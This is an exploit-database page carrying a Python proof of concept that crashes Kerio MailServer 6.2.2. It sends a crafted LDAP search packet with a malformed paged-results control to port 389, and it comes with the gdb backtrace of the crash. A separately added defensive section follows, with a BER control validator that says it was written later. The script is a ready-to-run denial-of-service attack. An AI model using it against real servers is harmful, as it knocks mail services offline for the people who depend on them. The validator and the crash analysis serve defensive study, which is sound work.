0day.today - Biggest Exploit Database in the World.
Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC
#!/usr/bin/env python
# kms1.py - Kerio MailServer 6.2.2 preauth remote DoS
# fixed in Kerio MailServer 6.3.1
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

"""
gdb backtrace:

# gdb -q ./mailserver core.18450
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0xb76000
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.
Program terminated with signal 11, Segmentation fault.
...
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
(gdb) bt
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
#1 0x0821c387 in LDAPSearchRequest::setAll ()
#2 0x08093d8a in Ber::getSearchRequest ()
#3 0x08205e48 in LDAPServer::search ()
#4 0x08207de0 in LDAPServer::server ()
#5 0x08207e2e in ldap_handler ()
#6 0x0841be13 in KServerTask::handler ()
#7 0x082033c6 in KThreadPool::workerThread ()
#8 0x086ee7b6 in kerio::tiny::thread ()
#9 0x00772b80 in start_thread () from /lib/libpthread.so.0
#10 0x00558dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>: mov (%eax),%edx
(gdb) i r eax
eax 0x449 1097
"""

from socket import *

host = "localhost"
port = 389

s = "\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02"
s += "\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62"
s += "\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04"
s += "\x20\x30\x82\x04\x1c"
s += "\x01"*1024
s += "\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31"
s += "\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04"
s += "\x00"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host,port))
sock.sendall(s)
sock.recv(10000)
sock.close()

# 0day.today [2024-11-16] #
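The backtrace above places the fault in the control-parsing path of an LDAP search request (Ber::getSearchRequest, LDAPSearchRequest::setAll, parsePagedResults). As a defensive illustration added here, which is not part of the original PoC or of Kerio's code, the following Python 3 check validates one BER-encoded Control against the RFC 4511 layout (controlType OCTET STRING, optional one-byte criticality BOOLEAN, optional controlValue OCTET STRING) before any field is used. The names read_tlv and check_control and the GOOD/BAD samples are constructed for this example; BAD is a shortened sample modeled on the Control element in the PoC, with BOOLEAN elements where controlType belongs.

```python
import re
OID_RE = re.compile(rb"\d+(\.\d+)+")  # LDAPOID is dotted-decimal text (RFC 4511)

def read_tlv(buf, pos):
    """Return (tag, value, next_pos); raise ValueError on malformed or truncated input."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    length = first
    if first >= 0x80:  # long form: low 7 bits give the number of length bytes
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("bad length encoding")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("length exceeds buffer")
    return tag, buf[pos:pos + length], pos + length

def check_control(control):
    """Return a list of problems for one encoded Control; an empty list means well-formed."""
    try:
        tag, body, end = read_tlv(control, 0)
        if tag != 0x30 or end != len(control):
            return ["not a single SEQUENCE"]
        items, pos = [], 0
        while pos < len(body):
            t, v, pos = read_tlv(body, pos)
            items.append((t, v))
    except ValueError as exc:
        return [str(exc)]
    problems = []
    if not items or items[0][0] != 0x04 or not OID_RE.fullmatch(items[0][1]):
        problems.append("controlType is not an OCTET STRING holding a dotted OID")
    rest = items[1:]
    if rest and rest[0][0] == 0x01:  # optional criticality BOOLEAN
        if len(rest[0][1]) != 1:
            problems.append("criticality BOOLEAN is not one byte")
        rest = rest[1:]
    if rest and rest[0][0] == 0x04:  # optional controlValue OCTET STRING
        rest = rest[1:]
    if rest:
        problems.append("%d unexpected trailing element(s)" % len(rest))
    return problems

# Constructed samples; OID is the string that appears in the PoC on this page.
OID = b"1.2.840.113556.1.4.473"
GOOD = b"\x30\x1d\x04\x16" + OID + b"\x01\x01\x00\x04\x00"
BAD = b"\x30\x29" + b"\x01\x01\x01" * 4 + b"\x01\x16" + OID + b"\x01\x01\x00\x04\x00"
```

A server or an LDAP-aware proxy can reject any request for which check_control returns a non-empty list before dispatching to control-specific parsing.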